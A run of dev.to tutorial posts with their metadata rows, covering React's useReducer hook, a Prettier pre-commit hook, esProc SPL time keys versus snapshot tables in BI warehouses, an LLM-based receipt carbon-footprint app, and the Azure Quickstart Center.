- The component uses the `useReducer` hook by calling it with the reducer function (`reducer`) and the initial state (`initialState`). It returns an array with two elements: the current state (`state`) and the dispatch function (`dispatch`).
- The component renders JSX that displays the current state value (`Hello Count: {state}`).
- The four buttons have `onClick` handlers that dispatch actions with different types to modify the state.
2. App.js:
```jsx
import "./styles.css";
import Usereducer from "./component/Usereducer";
export default function App() {
return (
<div className="App">
<h1>Hello CodeSandbox</h1>
<h2>Start editing to see some magic happen!</h2>
<h1>Hello sir ! </h1>
<Usereducer />
</div>
);
}
```
Explanation:
- The `App` component is the entry point of our application.
- It imports the CSS styles from "./styles.css" (which you may have defined separately) to apply to the component.
- It imports the `Usereducer` component from "./component/Usereducer" (relative path) to use it in the JSX.
- The component renders JSX that displays some headings and includes the `Usereducer` component.
3. index.js:
```jsx
import { StrictMode } from "react";
import { createRoot } from "react-dom/client";
import App from "./App";
const rootElement = document.getElementById("root");
const root = createRoot(rootElement);
root.render(
<StrictMode>
<App />
</StrictMode>
);
```
Explanation:
- The `index.js` file is responsible for rendering our application to the DOM.
- It imports `StrictMode` from the "react" module, which helps highlight potential issues in the application during development.
- It imports `createRoot` from the "react-dom/client" module to create a root element for rendering.
- It imports the `App` component from "./App" (relative path) to use it as the main component of the application.
- The `rootElement` variable represents the DOM element where the application will be rendered (identified by the "root" id).
- `createRoot` is called with `rootElement` to create a root object for rendering.
- `root.render` is used to render the `App` component inside the `StrictMode` wrapper, ensuring that the application runs in a strict mode.
Conclusion:
In this beginner's tutorial, we examined a code example that showcases the use of the `useReducer` hook in React.js. The code example can be accessed and experimented with at this [CodeSandbox link](https://codesandbox.io/s/usereduce-hook-iocf6f).
The `useReducer` hook, along with reducers, is a powerful combination for managing state in React applications. By understanding how reducers work, developers can create predictable and maintainable state management systems. The example code demonstrated how to initialize state, define a reducer function, dispatch actions, and update the UI based on state changes.
Reducers play a vital role in the `useReducer` hook. They take the current state and an action as inputs and return a new state based on the action type. By organizing the state update logic into reducers, developers can easily understand and modify state behavior as their applications grow.
Understanding the `useReducer` hook and reducers empowers developers to build scalable and efficient React components. By following the principles outlined in this tutorial, beginners can establish a strong foundation in utilizing `useReducer` for effective state management.
Feel free to explore and experiment with the provided code example using the CodeSandbox link. Modify the code, add new actions, or incorporate additional features to further enhance your understanding of `useReducer`.
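For instance, a hypothetical `reset` action could be added like this; the snippet is a sketch of changes to the component above, not a standalone file:
```jsx
// In the reducer's switch statement, add:
case "reset":
  return initialState; // back to 0, as defined above

// In the JSX, add a button that dispatches it:
<button onClick={() => dispatch({ type: "reset" })}>Reset</button>
```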
By incorporating the `useReducer` hook and understanding reducers, you'll be equipped with a powerful toolset to handle complex state logic in your React applications. Embrace the possibilities it offers and continue your journey into the world of React.js development. Happy coding!
Namaste coding! | gaurbprajapati |
1,514,703 | Automating Code Formatting with Bash and Prettier | Code formatting can be a tedious and time-consuming task, but it’s also an essential part of... | 0 | 2023-06-23T17:09:37 | https://dev.to/mazenadel19/automating-code-formatting-with-bash-and-prettier-1ddm | productivity, softwaredevelopment, programming, webdev | ---
title: Automating Code Formatting with Bash and Prettier
published: true
date: 2023-06-22 21:36:27 UTC
tags: productivity,softwaredevelopment,programming,webdevelopment
canonical_url:
---

Code formatting can be a tedious and time-consuming task, but it’s also an essential part of writing clean and maintainable code. Inconsistent formatting can make it difficult to read and understand code, and can even introduce bugs or errors.
Fortunately, there are tools available that can automate code formatting and ensure consistency across your codebase. Prettier is one such tool, and it’s become a popular choice among developers for its ease of use and flexibility.
In this tutorial, I’ll show you how to configure Prettier to automatically format your code using a pre-commit hook and a configuration file, including how to use a local configuration file to override a global configuration file.
### Step 1: Install Prettier
The first step is to install Prettier in your project. You can do this using npm or yarn:
```bash
npm install --save-dev --save-exact prettier
```
or
```bash
yarn add --dev --exact prettier
```
This installs Prettier as a development dependency in your project and ensures that you have a specific version of Prettier installed that will not change unexpectedly.
### Step 2: Create a Global Prettier Configuration File
Next, you’ll need to create a global configuration file for Prettier. This file tells Prettier how to format your code, and allows you to customize the formatting options to suit your preferences.
Create a file called .prettierrc in the root of your project, and add the following contents:
```json
{
"trailingComma": "es5",
"tabWidth": 2,
"semi": true,
"singleQuote": true
}
```
This configuration specifies that Prettier should use a comma after the last element in an array or object (using the “es5” option), use 2 spaces for indentation, add semicolons at the end of statements, and use single quotes for strings.
You can customize these options to suit your project’s coding style and conventions. For a full list of options and their values, see the [Prettier documentation](https://prettier.io/docs/en/options.html).
### Step 3: Create a Local Prettier Configuration File
When working on a project with an existing .prettierrc configuration, you may find that the formatting is difficult to read and work with or doesn’t match your personal preferences. For example, the line width may be set to 80, which can be too small for some screen sizes and cause discomfort when reading the code. To address this issue, you can create a local configuration file that allows you to override the global Prettier configuration and customize the formatting options to your preferences.
To create a local configuration file, create a file called .prettierrc.local.json in the root of your project and specify the desired formatting options. For example, you can set the tab width to 4 spaces instead of the 2 spaces specified in the global configuration. This ensures that your code is formatted according to your preferences without affecting the formatting of other files in the project.
```json
{
"tabWidth": 4,
"printWidth": 120
}
```
This configuration specifies that Prettier should use 4 spaces for indentation, instead of the 2 spaces specified in the global configuration and change the line width to 120 instead of the default 80 characters.
Additionally, to ensure that your personal formatting preferences do not cause unnecessary formatting changes when committing the code, we will use a pre-commit hook. This hook runs Prettier on the files that are about to be committed and ensures that they are formatted according to the `.prettierrc` configuration file. This way, your code is formatted according to your preferences while you work, while still maintaining consistency with the project's overall formatting standards.
### Step 4: Configure VS Code to Use the Local Configuration File
To use the local configuration file in VS Code, you need to add the prettier.configPath option to your VS Code settings. This tells the Prettier extension to use the local configuration file instead of the global configuration file.
To do this, open your VS Code settings (File > Preferences > Settings or using the shortcut Ctrl+,), and add the following line to your settings:
```json
{
"prettier.configPath": "./.prettierrc.local.json"
}
```
This configuration specifies the path to the local configuration file.
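Outside of VS Code, you can sanity-check which configuration file Prettier's own CLI resolves for a given file with its `--find-config-path` flag (note that the CLI follows its normal resolution rules, independent of the VS Code setting):
```bash
# Prints the path of the config file Prettier would use for this file
npx prettier --find-config-path src/index.js
```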
### Step 5: Install the Prettier Extension in VS Code
To use Prettier in VS Code, you must also install the Prettier extension. The extension provides integration with Prettier and makes it easy to run Prettier on your code directly from the editor.
To install the Prettier extension, open the Extensions view in VS Code (View > Extensions or using the shortcut Ctrl+Shift+X), search for “Prettier — Code formatter”, and click the Install button.
### Step 6: Create a Pre-Commit Hook
Now that Prettier is installed and configured, you can create a pre-commit hook that will automatically run Prettier on your code before each commit, and ensure that all code is properly formatted.
Create a file called .git/hooks/pre-commit (without a file extension) in your project, and add the following contents:
```bash
#!/bin/bash
# Get the list of files added or modified in this commit
files=$(git diff --cached --name-only --diff-filter=ACM | grep -E "\.(js|jsx)$")
# If there are no JavaScript or JSX files, exit without doing anything
if [ -z "$files" ]; then
exit 0
fi
# Run Prettier on the changed files using the shared configuration file
echo "Running Prettier on the following files:"
echo "$files"
for file in $files; do
npx --no-install prettier --config .prettierrc --write "$file"
git add "$file"
done
```
This script does the following:
- It uses Git to determine which files have been modified and staged for commit and filters the list to include only JavaScript and JSX files.
- It runs Prettier on the staged files using the shared `.prettierrc` configuration file (not your local override) and writes the corrected formatting back to the files.
- It uses Git to add the modified files back to the index so that the corrected formatting is included in the commit.
- It prints a message to the console indicating that Prettier has formatted the code.
- This script ensures that all staged JavaScript and JSX files are automatically formatted with Prettier before each commit, using the shared project configuration.
Make sure to make the pre-commit hook executable by running the following command in your bash terminal:
```bash
chmod +x .git/hooks/pre-commit
```
### Step 7: Test the Pre-Commit Hook
To test the pre-commit hook, you can create a test commit that introduces some formatting errors in your code, and see if the hook detects and fixes them before the commit is made.
Here’s an example workflow for testing the pre-commit hook:
1. Create a new file called test.js in your project directory and add some intentionally bad formatting to it. For example:
```javascript
const test=()=>{console.log('test');}
```
2. Stage the file for commit using `git add test.js`.
3. Attempt to commit the changes using `git commit -m "Test commit"`.
4. If the pre-commit hook is working properly, it should detect the formatting errors in test.js and fix them automatically. The output in your terminal should look something like this:
```bash
Running Prettier on the following files:
test.js
[warn] test.js
Code formatted with 1 warning
```
The [warn] message indicates that Prettier has detected a formatting error in the file, and the Code formatted with 1 warning message indicates that Prettier has corrected the formatting error.
### Conclusion
By following the steps in this tutorial, you can ensure that all of your code is consistently formatted, without having to spend time manually formatting each file. This can save you time and reduce the risk of formatting-related errors in your code.
If you enjoy automating tasks in your development workflow, you might also be interested in my other post on [automating the creation of React components](https://dev.to/mazenadel19/automate-the-boring-stuff-in-react-589m-temp-slug-7517845).
I hope this tutorial has been helpful. If you have any questions or feedback, please let us know in the comments! | mazenadel19 |
1,515,744 | Why Are There So Many Snapshot Tables in BI Systems? | There is a phenomenon that in BI systems of some big organizations there are a lot of snapshot tables... | 0 | 2023-06-24T23:55:35 | https://dev.to/jbx1279/why-are-there-so-many-snapshot-tables-in-bi-systems-4llo | database, bigdata, sql, programming | There is a phenomenon that in the BI systems of some big organizations there are a lot of snapshot tables in their data warehouses. Take the BI system of a certain transaction business as an example. There is a huge transaction details table stored as a number of segment tables by month, along with some tables that are not very large. The smaller tables, such as the customer table, employee table and product table, need to associate with the larger transaction details table. At the end of each month, all data of these smaller tables is stored as snapshot tables in order to match the current month's transaction details segment tables.
Why do they need so many seemingly redundant snapshot tables?
The transaction details table is a familiar type of fact table. A fact table stores data of actual occurrences. And it will become larger as time goes by. There are various other kinds of fact table, such as orders table, insurance policy table and bank transaction records table. A fact table is often associated with other tables through certain code fields. For instance, transaction details table relates to customer table, employee table and product table through customer id, employee id and product id respectively, orders table relates to product table through product id field, and bank transaction records tables relates to user table through user id. These tables related to the fact table are called dimension tables. In the following figure, the transaction details table and the customer table have a relationship of fact table and dimension table:

The reason of associating a fact table with a dimension table is that we need fields in a dimension table in computations. As the above shows, after joining detail table and customer table, we can group the former by customer’s city and calculate the total amount and count transactions in each group, or perform other computations.
Data in a dimension table is relatively stable though there are modifications. Update of a dimension table won’t affect the newly-generated data in the fact table, but it is likely that the fact table’s historical data does not match the dimension table’s new data. In this case, if we try to associate old data in the fact table with the new data in the dimension table, errors will occur.
Let's look at an instance. There is a customer James whose code is B20101. He lived in New York and had some transaction records. He then moved to Chicago on May 15, 2020 and had new transaction detail records there. If we just change James' city to Chicago in the customer table, his transactions that occurred in New York will be treated as Chicago transactions when we group detail records by customer's city and calculate the total amount in each city. That's an error. The error occurs because which city one of James' transaction records belongs to is determined by time. Putting all records under either New York or Chicago is incorrect.
If we ignore the error, aggregate values on the historical data in the BI system and those on the newly-generated data in the ERP system will not match. And the mismatch errors are hard to detect.
Snapshot tables appear as a solution. A snapshot of a data table is generated at a fixed time (such as at the end of each month), storing the fact table's data within a specified time period (like one month) and the whole dimension table at that time for later analysis and computation. This way the fact table will always be related to the dimension table of the corresponding time, and aggregate values will be correct.
But this results in many redundant dimension data and increases database storage load. Moreover, there are multiple dimension tables, and each dimension table corresponds to multiple snapshot tables, causing extremely complicated inter-table relationships and greatly complexing the whole system.
Another consequence is that code becomes complicated. For example, there will be one transaction details table and a batch of dimension table snapshots for each month. If we want to group details records by customer’s city and calculate transaction amount and count transactions in each city within one year, we need to associate every month’s transaction details table with their dimension table snapshots and perform eleven UNIONs. This is just a simple grouping and aggregation operation. For more complicated analysis and computations, we will have very long and complex SQL statements. They are hard to maintain and even difficult to optimize. That’s why many BI systems that use the snapshot solution prohibit analysis and computations on data within a long time period. Sometimes they only allow computations on data in one unit time period (like one month).
The snapshot solution also cannot completely resolve the issue of incorrect query result resulted by the change of data in dimension tables. It is impossible for a BI system to generate a snapshot instantly each time when data in a dimension table is changed (if so, there will be too many snapshot tables and storage load will be huge). Generally, snapshot tables are only generated at specified time interval. Between the two time points when snapshot tables are generated, computing errors will still occur if there are any changes in dimension table data. Suppose snapshot tables for transaction details table and customer table are generated on the last day of each month and James moves from New York to Chicago on May 15, then on May 31 when the snapshot tables are generated, James’ city will be regarded and saved as Chicago. In June when we try to perform a query on data of May, errors will appear because James’ transactions from May 1 to 15 that should have been put under New York are mistaken for Chicago’s, though the error is not a serious one.
A workaround is to generate a wide table based on the fact table and the dimension table. With this method, we join the transaction details table and the customer table to create a wide transaction table. In this wide table, information such as customer names and cities is not affected by changes of data in the customer dimension table. And this method ensures a simple data structure in the system. Yet the same problem still exists. As the wide table is generated at a specified time interval (generating wide table records in real time would be a drag on performance), any change of data in the dimension table between two generation time points will still result in an error. What's more, as the fact table and a dimension table have a many-to-one relationship, there will be a lot of redundant customer data in the wide transaction table, which leads to inflation of the fact table, whose space usage will be far heavier than that of the snapshot tables. There's one more problem. The wide table structure makes maintenance inconvenient, particularly when more fields need to be added, because we need to take care of handling the large volume of historical data. To keep this simple, we have to specify as complete a set of fields as possible when defining the wide table. A large and comprehensive wide table occupies even more space.
Let’s look at the issue in another way. Though dimension table data may change, it changes little. The amount of data updated is one or several orders of magnitudes smaller than the total data amount. Knowing this helps us use it to design a cost-effective solution.
The open-source data computing engine SPL uses this characteristic to design the **time key** mechanism. The mechanism can efficiently and precisely solve the issue caused by dimension table update.
The mechanism works like this. We add a time field in the dimension table. This new time field, which we call time key, and the original primary key field combine to form a new composite primary key. When joining the fact table and the dimension table, we create an association between the combination of the original foreign key field and a relevant time field in the fact table and the new composite primary key in the dimension table. This time-key-style association is different from the familiar foreign-key-style association. Records are not compared according to equivalence relations but are matched based on “the latest record before the specified time”.
Take the above transaction details table and customer table as examples. We add an effective date field edate to the customer table, as the following figure shows:

edate field contains the date when the current record appears, that is, the date when an update occurs. For instance, below is the customer table after James moves to Chicago:

As above shows, James has only one dimension record i before he moves to Chicago, and on the date when he moves record ii appears. The effective date is the date when he moves, which is 2020-05-15.
In this case, the SPL join between transaction details table and customer table will, except for comparing values between cid and id, also compare values between ddate and edate that records the record’s time of appearance and find out the record having the largest edate value that is not greater than ddate. This is the correct matching record (which is the latest record before the specified time point). As transaction records before James’ relocation are all before 2020-05-15, they will relate to record i in customer table where the effective date is 2017-02-01 and will be regarded as belonging to New York. The transaction records after James’ relocation fall on or after 2020-05-15, so they will relate to record ii where the effective date is 2020-05-15 and put under Chicago.
By using the time key mechanism, the joining result conforms to the facts. SPL can obtain correct results in later computations because it adds a record to the dimension table and stores the effective date at the time when the update occurs. The approach avoids the problem caused by generating snapshots and wide tables at regular time, and thereby getting rid of errors in performing computations within two regular time points.
Changes of data in a dimension table are small. There is little change in the size of a dimension table after the effective time information is added. Storage load will not increase noticeably.
In theory, we can add a similar time field to a dimension table in a relational database. The problem is that we cannot express the join relationship easily. Obviously, the time-key-based association is not the common equi-join. Even if we use a non-equi-join to achieve the association, we need complex subqueries to select the latest dimension table records before performing the join; the statement is too complicated and the performance is unstable. With relational databases, we have little choice but to use the snapshot/wide table solution.
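To see why, here is roughly what the "latest record before the specified time" match would look like in SQL, using the tables from the example above; this is a sketch for illustration, not tested against any particular database:
```sql
-- For each transaction, pick the customer record whose effective date (edate)
-- is the largest one not greater than the transaction date (ddate)
SELECT c.city, SUM(d.amt) AS total_amount, COUNT(*) AS transactions
FROM detail d
JOIN customer c
  ON c.id = d.cid
 AND c.edate = (SELECT MAX(c2.edate)
                FROM customer c2
                WHERE c2.id = d.cid
                  AND c2.edate <= d.ddate)
GROUP BY c.city
```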
The SPL code for achieving the time key mechanism is simple, as shown below:
```
     A                                        B
1    =T("customer.btx")                       >A1.keys@t(id,edate)
2    =file("detail.ctx").open().cursor()      =A2.switch(cid:ddate,A1)
3    =B2.groups(cid.city;sum(amt),count(~))
```
A1 imports the customer table. B1 defines a new composite primary key using id and edate; the @t option means the last field of the primary key is a time key. We can use a high-precision datetime field as the time key if needed.
A2 creates cursor for the transaction details table.
B2 creates association between A2’s cursor and A1’s customer table. The detail table’s joining fields are cid and ddate, and the customer table’s is the primary key. The operation works the same as one between regular dimension tables without a time keys.
A3 groups records in the joining result set by customer’s city, and calculates total amount and counts transactions in each city. In this step time keys are not involved.
The time key mechanism is one of SPL’s built-in features. The performance gap between a computation using the mechanism and one without using it is very small. Same as joins involving regular dimension tables, one can perform aggregations on any time ranges. There are no time limits as snapshot approach has.
The SPL time key mechanism deals with dimension data change issues in a convenient way. The fact table remains what it is, and we add a time field to the dimension table and record data change information only. The design ensures correct result and good performance while eliminating a large number of snapshot tables and reducing system complexity. It also avoids serious data redundancy resulted from wide table solution, and maintains a flexible system architecture.
Origin: https://blog.scudata.com/why-are-there-so-many-snapshot-tables-in-bi-systems/
SPL Source: https://github.com/SPLWare/esProc
| jbx1279 |
1,517,384 | How to build a LLM powered carbon footprint analysis app | In this post I am going to showcase how you can build an app that analyzes the carbon footprint of... | 0 | 2023-06-27T06:54:09 | https://codesphere.com/articles/llm-powered-carbon-footprint-app | tutorial, largelanguagemodels, ai, carbonfootprint | ---
title: How to build a LLM powered carbon footprint analysis app
published: true
date: 2023-06-26 13:03:07 UTC
tags: Tutorial,largelanguagemodels,AI,Carbonfootprint
canonical_url: https://codesphere.com/articles/llm-powered-carbon-footprint-app
---

In this post I am going to showcase how you can build an app that analyzes the carbon footprint of your grocery runs using the latest advances in large language models. We will be using the Aleph Alpha LLM API combined with Microsoft's Azure Form Recognizer in Python to build something truly amazing.
The app behind today's post is bigger than usual and initially took months of fine-tuning and work - it was the centerpiece of my previous startup Project Count. We tried to develop a convenient way to track how your daily actions influence your personal carbon footprint. Since we stopped development of that project, I'm using this post as an opportunity to open-source our code and show more people how you can use the advances in AI to make a positive impact.
The app is currently available for testing here: [https://40406-3000.2.codesphere.com/](https://40406-3000.2.codesphere.com/?ref=dev.to) (Subject to availability of my free API credits :D)
The entire code discussed here today alongside some example receipts can be found on GitHub: [https://github.com/codesphere-cloud/large-language-example-app](https://github.com/codesphere-cloud/large-language-example-app)
If you want to follow along check it out locally or on Codesphere and grab yourself the two API keys required. Both of them allow you to get started for free!
### How you can get it running
Clone the repository locally or in [codesphere](https://welcome.codesphere.com/?utm_source=llm-article&utm_medium=blog&utm_campaign=blog) via: [https://codesphere.com/https://github.com/codesphere-cloud/large-language-example-app](https://codesphere.com/https://github.com/codesphere-cloud/large-language-example-app)
1. Run `pipenv install`
2. Get an API key for the large language model API from Aleph Alpha (free credits provided upon signup) [https://app.aleph-alpha.com/signup](https://app.aleph-alpha.com/signup?ref=dev.to)
3. Sign up to Microsoft Azure and create an API key for the form recognizer (12 months free + free plan with rate limits afterwards) [https://azure.microsoft.com/en-us/free/ai/](https://azure.microsoft.com/en-us/free/ai/)
4. Set `ALEPH_KEY` env variable
5. Set `AZURE_FORM_ENDPOINT` env variable
6. Set `AZURE_FORM_KEY` env variable
7. Run `pipenv run python run.py`
8. Open localhost on port 3000
### How it's built part 1 - components / frameworks
| Framework | What it does |
| --- | --- |
| Python (Flask) | Puts everything together, runs calculations & server |
| Aleph Alpha | Semantic embeddings for similarity via LLM API |
| Microsoft Form recognizer | OCR service to turn pictures of receipts into usable structured data |
| Jinja | Frontend template engine, generates the HTML served to users |
| Bootstrap | CSS utility functions for styling the frontend |
Basically we are using Python, more specifically Flask to put it all together and do some data manipulation. The actual AI stuff is pulled from two third party providers, Microsoft for the form recognizer OCR (because it's outstanding & free to start) and Aleph Alpha to create semantic embeddings based on their large language model. We could easily switch that to use OpenAi GPT-4 API for this as well - the main reason we use Aleph Alpha here is because the initial version of this was built before the chatGPT release and OpenAi's pricing did not make it that easy to get started then. I'd love to see a performance comparison between the two here and I welcome anyone to create a fork of the repo to try this themselves - let me know!
There are a lot of great tutorials out there on how to set up a Flask app in general, so I will focus on the specific receipt analysis part, which I basically just embedded into a single-route Flask app based on the standard template.
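For orientation, the glue between the upload form and the analysis code looks roughly like the sketch below. The `analyze_receipt` name is the one used later in this post; the route, field and template names are assumptions, so check the repository for the real wiring:
```python
# Hypothetical single-route Flask app; names other than analyze_receipt are assumed
from flask import Flask, request, render_template
from analysis import analyze_receipt

app = Flask(__name__)

@app.route("/", methods=["GET", "POST"])
def index():
    results = None
    if request.method == "POST":
        image_bytes = request.files["receipt"].read()
        results = analyze_receipt(image_bytes)  # DataFrame rendered by the template
    return render_template("index.html", results=results)
```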
### How it's built part 2 - analysis.py
From the front end route we send the image bytes submitted via a file upload form.
The first function is called `azure_form_recognition`; it takes the image and runs it against Microsoft's OCR service, Form Recognizer, which has a pre-built model for recognizing receipts.
We iterate over the result items and grab fields like product description, quantity, total, and the store if available. Also, I added some data manipulation to recognize whether a quantity is an integer or a float with `,` or `.`, which happens for weighted items like loose fruit and vegetables. It's not 100% correct for all types of receipts, but this was tested and optimized based on real user data (>100 German receipts).
```python
def azure_form_recognition(image_input):
document = image_input
document_analysis_client = DocumentAnalysisClient(
endpoint=endpoint, credential=AzureKeyCredential(key)
)
poller = document_analysis_client.begin_analyze_document("prebuilt-receipt", document)
receipts = poller.result()
for idx, receipt in enumerate(receipts.documents):
if receipt.fields.get("MerchantName"):
store = receipt.fields.get("MerchantName").value
else:
store="Unknown store"
if receipt.fields.get("Items"):
d = []
for idx, item in enumerate(receipt.fields.get("Items").value):
item_name = item.value.get("Description")
if item_name:
d.append( {
"description": item_name.value,
"quantity" : [float(re.findall("[-+]?[.]?[\d]+(?:,\d\d\d)*[\.]?\d*(?:[eE][-+]?\d+)?", item.value.get("Quantity").content)[0].replace(",",".")) if item.value.get("Quantity") and item.value.get("Quantity").value !=None else 1][0],
"total" : [item.value.get("TotalPrice").value if item.value.get("TotalPrice") else 1][0]
}
)
grocery_input = pd.DataFrame(d)
return grocery_input, store
```
The output dataframe is now passed to a function called `match_and_merge_combined`, which takes the structured OCR result data, the Excel-based mappings for fuzzy string matching, and the semantic embedding dictionary, which we obtained by running an LLM-based semantic embedding algorithm over the entire dataset (more on this later).
The mapping dataset with the carbon footprints is our own - over 6 months of research went into it. We combined publicly available data like [this](https://denstoreklimadatabase.dk/en?ref=codesphere.ghost.io) with other datasets and field studies on typical package sizes in German supermarkets.
```python
def match_and_merge_combined(df1: pd.DataFrame, df2: pd.DataFrame, col1: str, col2: str, embedding_dict, cutoff: int = 80, cutoff_ai: int = 80, language: str = 'de'):
# adding empty row
df2 = df2.reindex(list(range(0, len(df2)+1))).reset_index(drop=True)
index_of_empty = len(df2) - 1
# Context - provides the context for our large language models
if language == 'de': phrase='Auf dem Kassenzettel steht: '
else: phrase='The grocery item is: '
# First attempt a fuzzy string based match = faster & cheaper than semantic match
indexed_strings_dict = dict(enumerate(df2[col2]))
matched_indices = set()
ordered_indices = []
scores = []
for s1 in df1[col1]:
match = fuzzy_process.extractOne(
query=s1,
choices=indexed_strings_dict,
score_cutoff=cutoff
)
# If match below cutoff fetch semantic match
score, index = match[1:] if match is not None else find_match_semantic(embedding_dict,phrase+s1)[1:]
if score < cutoff_ai:
index = index_of_empty
matched_indices.add(index)
ordered_indices.append(index)
scores.append(score)
```
_Match based on fuzzy string first and then via semantic similarity_
The mapping is called combined because we first run a fuzzy string matching algorithm with a cutoff threshold - this is faster and computationally cheaper than running the LLM-based semantic mapping and takes care of easy matches like `bananas` -> `banana`. Only if there is no match within the defined cutoff do we call the `find_match_semantic` function.
This function takes the current item, creates a semantic embedding via Aleph Alpha's API and compares it with all semantic embeddings in the dictionary.
An embedding is basically a high-dimensional mathematical representation of what the LLM understands about that item and its context. We can then calculate the cosine distance between embeddings and pick the embedding with the lowest distance. Large language models place similar items (within the given context of grocery receipt items) closer to each other, allowing matches like `tenderloin steak` -> `beef filet`, and this produces remarkably accurate results on our German receipts. From the chosen embedding we reverse-engineer which item that embedding belongs to based on its index, and thereby get the closest semantic match for each item.
```python
def find_match_semantic(embeddings, product_description: str):
embeddings_to_add = []
response = requests.post(
"https://api.aleph-alpha.com/semantic_embed",
headers={
"Authorization": f"Bearer {API_KEY}",
"User-Agent": "Aleph-Alpha-Python-Client-1.4.2",
},
json={
"model": model,
"prompt": product_description,
"representation": "symmetric",
"compress_to_size": 128,
},
)
result = response.json()
embeddings_to_add.append(result["embedding"])
cosine_similarities = {}
for item in embeddings:
cosine_similarities[item] = 1 - cosine(embeddings_to_add[0], embeddings[item])
result = (max(cosine_similarities, key=cosine_similarities.get),max(cosine_similarities.values())*100,list(cosine_similarities.keys()).index(max(cosine_similarities, key=cosine_similarities.get)))
return result
```
From there we do a bunch of data clean-up: remove NaNs and recalculate footprints for items with non-integer quantities. The logic is: for integer quantities we simply take `typical footprint per package` \* `quantity` = `estimated footprint`, whereas for float quantities we calculate `typical footprint per 100g` \* `quantity converted to 100g` = `estimated footprint`.
These are of course only estimates, but they have proven to be feasible on average in our previous startup's app.
```python
# Detect if item is measured in kg and correct values
merged_df["footprint"]= (merged_df["quantity"]*merged_df["typical_footprint"]).round(0)
merged_df.loc[~(merged_df["quantity"] % 1 == 0),"footprint"] = merged_df["quantity"]*10*merged_df["footprint_per_100g"]
merged_df.loc[~(merged_df["quantity"] % 1 == 0),"typical_weight"] = merged_df["quantity"]*1000
merged_df.loc[~(merged_df["quantity"] % 1 == 0),"quantity"] = 1
merged_df["footprint"] = merged_df["footprint"].fillna(0)
merged_df["product"] = merged_df["product"].fillna("???")
merged_df = merged_df.drop(["index"], axis=1).dropna(subset=["description"])
# Type conversion to integers
merged_df["footprint"]=merged_df["footprint"].astype(int)
# Set standardized product descriptions
merged_df.loc[(~pd.isna(merged_df["value_from"])),"product"] = merged_df["value_from"]
```
The resulting dataframe is sent to the frontend as a Jinja template variable, then looped over and displayed as a table alongside the initial image.
### How it's built part 3 - Create the semantic embedding dict
This is a one-time task for the dataset, repeated only after updating the mapping table - if you don't plan on modifying the dataset (e.g. for new items, different use cases such as home depot products instead of groceries, or translation to different languages) you can skip this step.
The code for this is stored in `search_embed.py`. It takes an Excel mapping table of the predefined format, appends some context (i.e. "this is an item from a grocery receipt") to each item (this needs to be language specific) and runs it through the LLM's semantic embedding endpoint. This task is computationally intense as it needs to call the API for 1000s of items - therefore we only do this once and store the resulting JSON in a dictionary. The file will be quite large, over 50 MB in my example.
To run this for an updated mapping Excel, change the lines mentioned in the code comment and run it via `pipenv run search_embed.py` - for my ~1,000 items this consumes about a quarter of my free Aleph Alpha credits, so make sure you don't run it more often than needed.
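For orientation, here is a minimal sketch of what that one-time job might look like - the endpoint and request body mirror `find_match_semantic` above, while the file names, column name, context sentence, and model name are all assumptions:

```python
import json

import pandas as pd
import requests

API_KEY = "..."  # your Aleph Alpha API key

# Mapping table with one standardized product per row ("product" column is an assumption)
mapping = pd.read_excel("mapping_table_de.xlsx")

embeddings = {}
for product in mapping["product"]:
    # Append receipt context so the embedding lives in the right semantic space
    prompt = f"Artikel auf einem Supermarkt-Kassenbon: {product}"  # context sentence is an assumption
    response = requests.post(
        "https://api.aleph-alpha.com/semantic_embed",
        headers={"Authorization": f"Bearer {API_KEY}"},
        json={
            "model": "luminous-base",  # model name is an assumption
            "prompt": prompt,
            "representation": "symmetric",
            "compress_to_size": 128,
        },
    )
    embeddings[product] = response.json()["embedding"]

# Persist once; the matching code only ever reads this file
with open("embeddings_de.json", "w") as f:
    json.dump(embeddings, f)
```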
### How it's built part 4 - Language switch
The model and dataset are optimized for German grocery receipts. I've included an English version of the dataset (Google-Translate-based) for demonstration purposes. To use it, simply change the function called from the routes from `analyze_receipt` to `analyze_receipt_en`; it will use the translated Excel file and embedding dictionary.
Please be aware that the translations are far from perfect and I have not run equally extensive tests to see how well the English version performs in real-world scenarios.
### Summary
I hope you were able to follow along, get your own version running, and maybe even got some inspiration on how the new possibilities of large language models can be used to help us live more sustainably.
The GitHub Repo is public and I invite everyone to take it and continue developing from there - from my perspective all my input is now open source and public domain. Feel free to reach out if you want to continue the project or have any questions.
If you haven't checked out [codesphere](https://welcome.codesphere.com/?utm_source=llm-article&utm_medium=blog&utm_campaign=blog) - hosting projects like these (and much more) has never been easier. | simoncodephere |
1,518,218 | AZURE QUICKSTART CENTER: THE QUICKEST WAY TO UNDERSTANDING AZURE FUNCTIONALITY AND USING AZURE SERVICES. | This blog is an overview of Azure Quickstart Center as a guide to an individual or organization who... | 0 | 2023-06-29T09:38:26 | https://dev.to/donhadley22/azure-quickstart-center-the-quickest-way-to-understanding-azure-fuctionality-and-using-azure-services-1o84 |  | **This blog is an overview of the Azure Quickstart Center, intended as a guide for individuals or organizations who are new to the Microsoft Azure platform and wish to understand its structure, best practices, and usage without wasting valuable time.**
We will begin by taking an overview of the **Azure Quickstart Center** and conclude by deploying an Azure resource using the Quickstart Center.
**OVERVIEW OF AZURE QUICKSTART CENTER**
The **Azure Quickstart Center** is the fastest way to explore and get yourself acquainted with the Azure architecture and services.
The Quickstart Center offers a step-by-step guide on how to find your way around the Azure platform.
**Let us review some steps to getting the best out of Azure Quickstart Center.**
**STEP 1: OVERVIEW OF THE QUICKSTART CENTER**
- Sign into the Azure portal at https://portal.azure.com
- Type and select **Quickstart Center** in the search bar at the top of the page.

- On the **Quickstart Center** page, you will be presented with two options: **Projects and guides** or **Take an online course**.
- Under **Projects and guides**, you have **Start a project**, and right below you will see templates for the **seven** most popular Azure services. You may dive in by selecting the service you wish to use. This will allow you to learn as you build new workloads in Azure.

- Or scroll down further on the same page to see the **Setup guides**, which will walk you through deployment scenarios to help you set up, manage, and secure your Azure environment.

- On the other hand, you can select the **Take an online course** option if you wish to learn about Azure before using the service. This will usher you into a page that has **five** course modules to guide you through the basics of understanding Azure, as well as a **Browse our full Azure catalog** option if you wish to see more.

You can select any of the above courses to start your Azure journey.
**STEP 2: QUICKEST WAY TO PROVISION A RESOURCE**
Let us look at another very important use of the **Quickstart Center**.
When you wish to quickly deploy a resource in Azure, your surest and fastest means of achieving this is through the **Quickstart Center**, because it provides you with access to deployment templates for all the Azure services with all the best-practice configurations in place.
**Let's demonstrate this by creating a Web App**
- Go to the **Quickstart Center**, select **Projects and guides**, go to **Create a web app**, and click **Start**.

